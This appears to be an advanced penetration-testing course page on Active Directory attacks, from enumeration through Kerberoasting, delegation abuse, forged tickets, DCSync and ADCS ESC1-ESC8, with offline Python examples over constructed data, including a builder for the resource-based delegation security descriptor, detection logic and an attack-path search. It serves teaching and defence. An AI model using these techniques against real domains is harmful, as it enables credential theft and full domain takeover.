Active Directory Security
Master Windows domain exploitation - From enumeration to complete domain takeover
Level: Advanced
Overview
Active Directory security is a critical skill for any penetration tester working in enterprise environments. This advanced module covers comprehensive AD attack vectors, from initial enumeration to complete domain compromise. You'll learn both traditional and modern attack techniques used by real-world threat actors.
Learning Objectives
- Master Active Directory enumeration and reconnaissance
- Develop expertise in Kerberos-based attacks
- Learn Golden and Silver Ticket attack techniques
- Understand ADCS certificate-based attacks
- Master delegation abuse and DCSync attacks
- Use BloodHound to find and rank attack paths
AD Enumeration & Reconnaissance
Domain Information Gathering
Techniques for gathering domain intelligence with a low detection footprint: authenticated LDAP reads look like ordinary directory traffic, whereas port scans and mass SMB enumeration do not.
- Domain trust enumeration
- Domain controller identification
- Forest and domain functional levels
- Service Principal Name (SPN) discovery
User & Group Enumeration
Advanced user and group enumeration techniques for privilege escalation planning.
- Domain admin and privileged group identification
- Service account discovery
- Nested group membership analysis
- User property extraction
Computer & Service Discovery
Identifying high-value targets and attack paths within the domain.
- Domain controller enumeration
- Server role identification
- Workstation operating system analysis
- Service account mapping
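The three enumeration lists above converge on one artefact: a dump of user and computer objects that you then triage for roastable accounts, delegation settings and privileged principals. The script below is an added example, not code from the original page; it runs offline over a handful of constructed records using AD's real attribute names and userAccountControl bit values (a real ldapdomaindump or PowerView export has the same fields, thousands of times over).

```python
# Added example: offline triage of LDAP user/computer objects. Records are constructed;
# attribute names and userAccountControl bit values are Active Directory's own.
UAC_BITS = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,               # set on domain controllers
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,            # unconstrained delegation
    "NOT_DELEGATED": 0x100000,                    # "account is sensitive and cannot be delegated"
    "DONT_REQ_PREAUTH": 0x400000,                 # AS-REP roastable
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # constrained delegation with protocol transition
}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators",
                     "Account Operators", "Backup Operators", "Schema Admins"}


def decode_uac(value: int) -> set:
    """Expand a userAccountControl integer into the names of the bits that are set."""
    return {name for name, bit in UAC_BITS.items() if value & bit}


def triage(obj: dict) -> list:
    """Attack-relevant findings for one LDAP object (dict of attribute -> value)."""
    name = obj["sAMAccountName"]
    flags = decode_uac(int(obj.get("userAccountControl", 0)))
    is_dc = "SERVER_TRUST_ACCOUNT" in flags
    is_computer = is_dc or "WORKSTATION_TRUST_ACCOUNT" in flags or name.endswith("$")
    if "ACCOUNTDISABLE" in flags:
        return ["disabled"]  # cannot be roasted or used for delegation as-is
    findings = []
    # Kerberoasting wants a user (not machine) account with an SPN; machine and krbtgt keys are random.
    if obj.get("servicePrincipalName") and not is_computer and name.lower() != "krbtgt":
        findings.append("kerberoastable")
    if "DONT_REQ_PREAUTH" in flags and not is_computer:
        findings.append("asreproastable")
    if "TRUSTED_FOR_DELEGATION" in flags and not is_dc:  # DCs hold this bit legitimately
        findings.append("unconstrained-delegation")
    if obj.get("msDS-AllowedToDelegateTo"):
        kind = "constrained-delegation"
        if "TRUSTED_TO_AUTH_FOR_DELEGATION" in flags:
            kind += "+protocol-transition"  # S4U2Self works without a ticket from the victim
        findings.append(kind)
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("rbcd-configured")
    # memberOf holds DNs; pull the CN out of each to compare with group names.
    group_cns = {dn.split(",")[0][3:] for dn in obj.get("memberOf", [])}
    if PRIVILEGED_GROUPS & group_cns or int(obj.get("adminCount", 0)) == 1:
        findings.append("privileged")
        if "NOT_DELEGATED" not in flags:
            findings.append("privileged-and-delegatable")  # its TGT can be caught via unconstrained delegation
    if "PASSWD_NOTREQD" in flags:
        findings.append("password-not-required")
    return findings


def report(objects: list) -> dict:
    """Invert per-object findings into finding -> [accounts], which is the view you plan from."""
    out = {}
    for obj in objects:
        for finding in triage(obj):
            out.setdefault(finding, []).append(obj["sAMAccountName"])
    return out


SAMPLE = [  # constructed export; a real one has thousands of objects
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "j.doe", "userAccountControl": 0x400200},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202, "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000},
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x1000200,
     "msDS-AllowedToDelegateTo": ["cifs/file01.corp.local"]},
    {"sAMAccountName": "admin.jane", "userAccountControl": 0x200, "adminCount": 1,
     "memberOf": ["CN=Domain Admins,CN=Users,DC=corp,DC=local"]},
]

if __name__ == "__main__":
    for finding, accounts in sorted(report(SAMPLE).items()):
        print(f"{finding:45} {', '.join(accounts)}")
```

The useful part is the inversion in report(): a list of accounts per finding is what you carry into the Kerberos and delegation sections, and it is also a reasonable first pass for a defender auditing their own export.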
Kerberos Attacks
Kerberoasting
Extracting and cracking service account credentials via Kerberos TGS tickets.
- SPN identification and targeting
- TGS ticket extraction techniques
- Offline password cracking strategies
- Targeted vs. broad Kerberoasting
ASREPRoasting
Exploiting accounts with "Do not require Kerberos preauthentication" setting.
- Vulnerable account identification
- AS-REP hash extraction
- Cracking AS-REP hashes with Hashcat (mode 18200 for RC4, etype 23)
- User enumeration via pre-authentication responses (the KDC answers differently for unknown principals and for known ones that require pre-auth)
Kerberos Delegation Abuse
Exploiting constrained and unconstrained delegation for privilege escalation.
- Unconstrained delegation exploitation
- Constrained delegation abuse
- Resource-based constrained delegation
- S4U2Self and S4U2Proxy attacks
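Resource-based constrained delegation is configured by writing a security descriptor into the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, so the attack is really "build a binary SD that grants your computer account full control, then LDAP-modify it onto the victim". The code below is an added example, not the page's or impacket's code; it assembles that self-relative descriptor byte by byte using the MS-DTYP layouts (the same shape common tooling such as impacket's rbcd.py writes: owner BUILTIN\Administrators, one full-control ACE per attacker SID, no SACL) and parses one back, which is equally useful for the security descriptor manipulation listed later under persistence. The SIDs are constructed.

```python
# Added example: build and read the RBCD security descriptor. Layouts are MS-DTYP's; SIDs are constructed.
import struct

FULL_CONTROL = 0x000F01FF   # mask rbcd.py grants: standard rights + all object-specific rights
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> revision, sub-authority count, 48-bit big-endian authority, LE sub-authorities."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"malformed SID: {sid!r}")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf: bytes) -> str:
    revision, count = buf[0], buf[1]
    authority = int.from_bytes(buf[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def access_allowed_ace(sid: str, mask: int) -> bytes:
    body = struct.pack("<I", mask) + sid_to_bytes(sid)
    return struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, 4 + len(body)) + body  # type, flags, size


def build_acl(aces: list) -> bytes:
    body = b"".join(aces)
    return struct.pack("<BBHHH", 2, 0, 8 + len(body), len(aces), 0) + body  # ACL_REVISION = 2


def rbcd_descriptor(attacker_sids: list) -> bytes:
    """Self-relative SD: owner/group BUILTIN\\Administrators, no SACL, DACL of full-control ACEs."""
    owner = group = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    dacl = build_acl([access_allowed_ace(s, FULL_CONTROL) for s in attacker_sids])
    off_owner = 20  # fixed SECURITY_DESCRIPTOR header size
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + group + dacl


def allowed_to_act(sd: bytes) -> list:
    """Audit helper: SIDs of the ACCESS_ALLOWED ACEs in a self-relative SD's DACL."""
    control = struct.unpack_from("<H", sd, 2)[0]
    off_dacl = struct.unpack_from("<I", sd, 16)[0]
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    ace_count = struct.unpack_from("<H", sd, off_dacl + 4)[0]
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd[pos + 8:pos + ace_size]))
        pos += ace_size
    return sids


if __name__ == "__main__":
    # Constructed SID of the computer account the attacker controls (e.g. one created via MachineAccountQuota).
    sd = rbcd_descriptor(["S-1-5-21-1111111111-2222222222-3333333333-1105"])
    print(len(sd), "bytes;", sd.hex())
    print("allowed to act:", allowed_to_act(sd))
```

Writing the attribute needs WriteProperty on it (or GenericWrite/GenericAll on the computer object); afterwards S4U2Self plus S4U2Proxy from the attacker's computer account yields a service ticket to the victim as any non-protected user (getST.py -impersonate). Defenders can run allowed_to_act() over every computer's attribute value and alert on SIDs that are not the expected service accounts.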
Golden & Silver Ticket Attacks
Golden Ticket Creation
Forging TGTs with the KRBTGT account's key, which the KDC will accept for any principal in the domain.
- KRBTGT hash extraction
- Domain SID identification
- Ticket lifetime and group membership
- Cross-domain Golden Tickets
Silver Ticket Exploitation
Forging service tickets with a service account's key: access to that one service, without the KDC ever seeing a request.
- Service account hash extraction
- Service-specific ticket creation
- Host-based Silver Tickets
- CIFS, HTTP, and MSSQL Silver Tickets
Ticket Persistence Techniques
Maintaining persistent access through ticket manipulation.
- Ticket injection and renewal
- Memory-based ticket storage
- Cross-session ticket usage
- Ticket lifetime extension
DCSync & DCShadow Attacks
DCSync Implementation
Replicating password hashes from a domain controller over the directory replication protocol (DRSUAPI), without running code on the DC. It does require the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object, which by default only Domain Admins, Enterprise Admins, Administrators and domain controllers hold.
- Directory Replication Service abuse
- Selective hash extraction
- Replicating NTDS.dit secrets (NT hashes, Kerberos keys, password history) via DRSUAPI
- Stealth DCSync methodologies
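DCSync and the forged tickets from the previous section leave complementary traces on domain controllers: DCSync shows up as directory-service access (event 4662) with replication-right GUIDs from an account that is not a DC, a Golden Ticket as service-ticket requests (4769) for an account no DC ever issued a TGT (4768) to, and a Silver Ticket as a Kerberos logon (4624) on a host for which no DC issued a service ticket at all. The script below is an added example, not code from the page; it runs those correlations over constructed events. The event IDs and the three replication GUIDs are Microsoft's, everything else (hosts, accounts, the DC allow-list) is made up for the example.

```python
# Added example: DC event correlation for DCSync and forged tickets over constructed events.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Constructed allow-list; populate it from the Domain Controllers OU, and add the Azure AD Connect
# service account if you have one, since it replicates legitimately.
DOMAIN_CONTROLLERS = {"DC01$", "DC02$"}


def dcsync_suspects(events):
    """4662 on a DC whose Properties carry a replication-right GUID, from an account that is not a DC."""
    hits = []
    for e in events:
        if e["id"] != 4662 or e["host"] not in DOMAIN_CONTROLLERS:
            continue
        rights = [REPLICATION_RIGHTS[g] for g in e.get("properties", []) if g in REPLICATION_RIGHTS]
        if rights and e["account"] not in DOMAIN_CONTROLLERS:
            hits.append((e["account"], rights))
    return hits


def forged_ticket_suspects(events):
    """Golden: a 4769 for an account no DC issued a TGT (4768) to.
    Silver: a Kerberos network logon (4624, type 3) on a host for which no DC issued that account a
    service ticket (4769 Service Name is the host's machine account for HOST/CIFS/etc. SPNs).
    Both need logs from *every* DC for the whole lookback window (a TGT lives 10 hours by default),
    otherwise tickets issued earlier or by another DC will false-positive."""
    tgt_accounts = {e["account"] for e in events if e["id"] == 4768}
    tgs_pairs = {(e["account"], e["service"].upper()) for e in events if e["id"] == 4769}
    golden = sorted({e["account"] for e in events
                     if e["id"] == 4769 and e["account"] not in tgt_accounts})
    silver = sorted({(e["account"], e["host"]) for e in events
                     if e["id"] == 4624 and e.get("package") == "Kerberos" and e.get("logon_type") == 3
                     and (e["account"], e["host"].upper() + "$") not in tgs_pairs})
    return golden, silver


SAMPLE_EVENTS = [  # constructed
    {"id": 4768, "host": "DC01$", "account": "alice"},
    {"id": 4769, "host": "DC01$", "account": "alice", "service": "WEB01$"},
    {"id": 4624, "host": "WEB01", "account": "alice", "package": "Kerberos", "logon_type": 3},
    {"id": 4624, "host": "FILE01", "account": "mallory", "package": "Kerberos", "logon_type": 3},
    {"id": 4769, "host": "DC02$", "account": "bob", "service": "DC01$"},
    {"id": 4662, "host": "DC01$", "account": "svc_backup",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 4662, "host": "DC01$", "account": "DC02$",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 4662, "host": "DC01$", "account": "j.doe",
     "properties": ["00000000-0000-0000-0000-000000000001"]},  # placeholder GUID, not a replication right
]

if __name__ == "__main__":
    print("DCSync:", dcsync_suspects(SAMPLE_EVENTS))
    golden, silver = forged_ticket_suspects(SAMPLE_EVENTS)
    print("possible Golden Ticket use:", golden)
    print("possible Silver Ticket use:", silver)
```

The 4662 check is the high-confidence one and is what most "stealth DCSync" tricks try to dodge (replicating from a DC's own IP, or from an account that is expected to replicate), which is why the allow-list should be accounts, not addresses. The ticket correlations are weaker and only become reliable once all DC logs are centralised.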
DCShadow Exploitation
Creating rogue domain controllers for persistent manipulation.
- Rogue DC registration
- Schema manipulation
- Object attribute modification
- Backdoor user creation
Advanced Persistence
Long-term domain persistence through directory manipulation.
- AdminSDHolder abuse
- Group Policy modification
- Security descriptor manipulation
- DSRM password attacks
ADCS Certificate Attacks
Certificate Template Abuse
Exploiting misconfigured certificate templates for privilege escalation.
- ESC1: Templates that let the enrollee supply the subject (SAN), carry an authentication EKU, and are enrollable by low-privileged users without manager approval
- ESC2: Templates with the Any Purpose EKU or no EKU at all
- ESC3: Misconfigured enrollment agent templates (Certificate Request Agent EKU)
- ESC4: Vulnerable certificate template access control (write rights on the template object)
PKI Infrastructure Attacks
Advanced attacks against the PKI infrastructure itself.
- ESC5: Vulnerable PKI object access control
- ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2
- ESC7: Vulnerable certificate authority access control
- ESC8: NTLM relay to AD CS HTTP endpoints
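The ESC checks above are mostly flag-and-EKU comparisons on template objects plus a few CA-level settings, which is what Certify and Certipy automate. The script below is an added example, not the page's code and not either tool's; it is a simplified version of those checks over constructed template and CA records. Flag values and OIDs are Microsoft's; the enroll/write/manage principal lists stand in for ACEs that a real tool would parse out of nTSecurityDescriptor, and the CA's web-enrollment fields are a constructed summary of what you would check on the server.

```python
# Added example: simplified ESC1-ESC4 and ESC6-ESC8 checks over constructed AD CS records.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: CA manager approval required
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000     # CA policy EditFlags (certutil -getreg policy\EditFlags)

OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
OID_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_ANY_PURPOSE = "2.5.29.37.0"
OID_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {OID_CLIENT_AUTH, OID_PKINIT_CLIENT_AUTH, OID_SMARTCARD_LOGON, OID_ANY_PURPOSE}
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def enables_auth(ekus: list) -> bool:
    # A template with no EKU at all is usable for any purpose, authentication included.
    return not ekus or bool(AUTH_EKUS & set(ekus))


def low_priv_can(principals: list) -> bool:
    return bool(LOW_PRIV & set(principals))


def template_findings(t: dict) -> list:
    name_flags = t.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flags = t.get("msPKI-Enrollment-Flag", 0)
    ekus = t.get("pKIExtendedKeyUsage", [])
    # Preconditions shared by ESC1-ESC3: a low-privileged principal can enroll, no manager
    # approval, and no authorized signatures required on the request.
    enrollable = (low_priv_can(t.get("enroll", []))
                  and not enroll_flags & CT_FLAG_PEND_ALL_REQUESTS
                  and t.get("msPKI-RA-Signature", 0) == 0)
    out = []
    if enrollable and name_flags & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and enables_auth(ekus):
        out.append("ESC1")  # requester picks the SAN: a logon certificate for any account
    if enrollable and (not ekus or OID_ANY_PURPOSE in ekus):
        out.append("ESC2")  # any-purpose / no-EKU certificate
    if enrollable and OID_CERT_REQUEST_AGENT in ekus:
        out.append("ESC3")  # enrollment agent: request certificates on behalf of other users
    if low_priv_can(t.get("write", [])):
        out.append("ESC4")  # write on the template object: turn it into ESC1 yourself
    return out


def ca_findings(ca: dict) -> list:
    out = []
    if ca.get("EditFlags", 0) & EDITF_ATTRIBUTESUBJECTALTNAME2:
        out.append("ESC6")  # every request to this CA may carry a SAN, whatever the template says
    if low_priv_can(ca.get("manage_ca", [])) or low_priv_can(ca.get("manage_certificates", [])):
        out.append("ESC7")  # ManageCA / ManageCertificates rights for low-privileged principals
    if ca.get("web_enrollment") and not ca.get("web_enrollment_epa"):
        out.append("ESC8")  # HTTP enrollment endpoint accepting NTLM without EPA: relay target
    return out


def audit(templates: list, ca: dict) -> dict:
    result = {t["name"]: template_findings(t) for t in templates}
    result[ca["name"]] = ca_findings(ca)
    return {k: v for k, v in result.items() if v}


SAMPLE_TEMPLATES = [  # constructed
    {"name": "VulnUser", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": [OID_CLIENT_AUTH], "enroll": ["Domain Users"]},
    {"name": "User", "pKIExtendedKeyUsage": [OID_CLIENT_AUTH, "1.3.6.1.5.5.7.3.4"],
     "enroll": ["Domain Users"]},
    {"name": "AnyPurpose", "pKIExtendedKeyUsage": [OID_ANY_PURPOSE], "enroll": ["Authenticated Users"]},
    {"name": "Agent", "pKIExtendedKeyUsage": [OID_CERT_REQUEST_AGENT], "enroll": ["Domain Users"]},
    {"name": "Approved", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
     "pKIExtendedKeyUsage": [OID_CLIENT_AUTH], "enroll": ["Domain Users"]},
    {"name": "Locked", "msPKI-Certificate-Name-Flag": 0x1, "pKIExtendedKeyUsage": [OID_CLIENT_AUTH],
     "enroll": ["Domain Admins"], "write": ["Domain Users"]},
]
SAMPLE_CA = {"name": "CORP-CA", "EditFlags": EDITF_ATTRIBUTESUBJECTALTNAME2,  # other bits omitted
             "manage_ca": ["Domain Admins"], "manage_certificates": ["Domain Admins"],
             "web_enrollment": True, "web_enrollment_epa": False}

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_TEMPLATES, SAMPLE_CA).items():
        print(f"{name:12} {', '.join(findings)}")
```

The "Approved" template shows the one cheap fix that neutralises ESC1, ESC2 and ESC3 without touching EKUs: CA manager approval. ESC5 is left out because it is about ACLs on the CA's computer object and its AD containers rather than template attributes.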
Certificate-Based Persistence
Using certificates for long-term domain access.
- User certificate theft
- Machine certificate abuse
- Shadow credentials attack
- Certificate template backdooring
BloodHound Analysis
Data Collection
Comprehensive Active Directory data collection for attack path analysis.
- SharpHound data collection
- BloodHound.py remote collection
- AzureHound for cloud environments
- Custom collector development
Attack Path Discovery
Identifying and visualizing paths to high-value targets.
- Shortest path to Domain Admins
- Kerberoastable user identification
- ASREPRoastable account discovery
- Unconstrained delegation hunting
Custom Queries & Analysis
Advanced Cypher queries for targeted attack planning.
- Custom Cypher query development
- Edge relationship analysis
- Privilege escalation path mapping
- Lateral movement planning
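Every query in this section, from "shortest path to Domain Admins" to a custom Cypher pattern, is a graph search over collector output, and nested group membership is just MemberOf edges chained together. The script below is an added example, not code from the page or from BloodHound; it performs the same breadth-first shortest-path search in plain Python over a constructed edge list that uses BloodHound's edge names and NAME@DOMAIN naming, and annotates each hop with what traversing it costs the attacker. The graph is made up for the example.

```python
# Added example: BloodHound-style shortest-path search over a constructed edge list.
from collections import deque

EDGES = [  # (source, edge, target); constructed graph
    ("J.DOE@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "WS42.CORP.LOCAL"),
    ("WS42.CORP.LOCAL", "HasSession", "SVC_BACKUP@CORP.LOCAL"),
    ("SVC_BACKUP@CORP.LOCAL", "GenericAll", "IT-ADMINS@CORP.LOCAL"),
    ("IT-ADMINS@CORP.LOCAL", "MemberOf", "SERVER-ADMINS@CORP.LOCAL"),  # nested membership
    ("SERVER-ADMINS@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("ALICE@CORP.LOCAL", "MemberOf", "SQL-OPS@CORP.LOCAL"),
    ("SQL-OPS@CORP.LOCAL", "AdminTo", "SQL01.CORP.LOCAL"),
    ("SQL01.CORP.LOCAL", "HasSession", "ADMIN.JANE@CORP.LOCAL"),
    ("ADMIN.JANE@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("BOB@CORP.LOCAL", "MemberOf", "DOMAIN USERS@CORP.LOCAL"),          # dead end
]

# What traversing each edge type costs (the gist of the abuse info BloodHound shows per edge).
PLAYBOOK = {
    "MemberOf": "free: group membership is transitive",
    "AdminTo": "execute on the host (psexec/wmiexec) and dump LSASS or registry secrets",
    "HasSession": "that user's credentials are in LSASS on the host",
    "GenericAll": "full control: add yourself to the group, or reset/roast/shadow-credential the user",
}


def shortest_path(edges, start, target):
    """Breadth-first search over directed edges; returns [(src, edge, dst), ...] or None.
    Equivalent Cypher: MATCH p=shortestPath((s {name:$start})-[*1..]->(t {name:$target})) RETURN p"""
    adjacency = {}
    for src, rel, dst in edges:
        adjacency.setdefault(src, []).append((rel, dst))
    previous = {start: None}
    queue = deque([start])
    while queue and target not in previous:
        node = queue.popleft()
        for rel, nxt in adjacency.get(node, []):
            if nxt not in previous:
                previous[nxt] = (node, rel)
                queue.append(nxt)
    if target not in previous:
        return None
    path, node = [], target
    while previous[node] is not None:
        src, rel = previous[node]
        path.append((src, rel, node))
        node = src
    return path[::-1]


def explain(path):
    return [f"{src} -[{rel}]-> {dst}: {PLAYBOOK.get(rel, 'see BloodHound abuse info')}"
            for src, rel, dst in path]


if __name__ == "__main__":
    for user in ("J.DOE@CORP.LOCAL", "ALICE@CORP.LOCAL", "BOB@CORP.LOCAL"):
        path = shortest_path(EDGES, user, "DOMAIN ADMINS@CORP.LOCAL")
        print(user, "->", "no path" if path is None else f"{len(path)} hops")
        for line in explain(path or []):
            print("   ", line)
```

Fewest hops is not the same as cheapest: the ALICE path is shorter, but it depends on ADMIN.JANE still being logged on to SQL01 when you get there, whereas the J.DOE path ends in a GenericAll that works whenever you run it. That is why the custom queries on the page are worth writing: weighting edges by reliability and noise, not just counting them.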
Hands-on Lab: Complete AD Compromise
Objective: Perform a full Active Directory compromise from initial foothold to Domain Admin.
Duration: 8-12 hours
Skills Practiced: AD enumeration, Kerberos attacks, privilege escalation, persistence
Essential Tools
Enumeration Tools
- BloodHound: AD attack path analysis
- PowerView: PowerShell AD enumeration
- ADRecon: AD information gathering
- ldapdomaindump: LDAP enumeration
Attack Tools
- Impacket: Python AD attack toolkit
- Rubeus: C# Kerberos interaction
- Mimikatz: Credential extraction
- Certify: ADCS attack tool
Post-Exploitation
- PowerShell Empire: Post-exploitation framework
- Cobalt Strike: Red team platform
- SharpCollection: C# offensive tools
- LOLBAS: Living off the land binaries
Recommended Resources
- Active Directory Security - Sean Metcalf's comprehensive guide
- Attacking Active Directory - Modern AD attack techniques
- BloodHound Documentation - Official attack path analysis guide
- SpecterOps Blog - Advanced AD research and techniques
- HarmJ0y Blog - PowerShell and AD exploitation research
Certification Alignment
CRTP (Certified Red Team Professional)
This module directly aligns with CRTP certification requirements:
- Active Directory Enumeration
- Local Privilege Escalation
- Lateral Movement
- Domain Privilege Escalation
- Domain Persistence
- Forest-level Privilege Escalation
ADCS CESP (Certificate Services)
Advanced ADCS attack techniques covered:
- Certificate Template Exploitation
- PKI Infrastructure Attacks
- ESC1-ESC8 Attack Scenarios
- Certificate-Based Persistence
Frequently Asked Questions
What is Active Directory security?
Active Directory security focuses on protecting and hardening Microsoft AD environments against attacks.
What topics are covered in this roadmap?
Enumeration, Kerberos attacks (Kerberoasting, ASREPRoasting, delegation abuse), Golden and Silver Tickets, DCSync and DCShadow, ADCS exploitation, and BloodHound attack path analysis.
Who should use this roadmap?
Penetration testers, red teamers, and system administrators working with AD.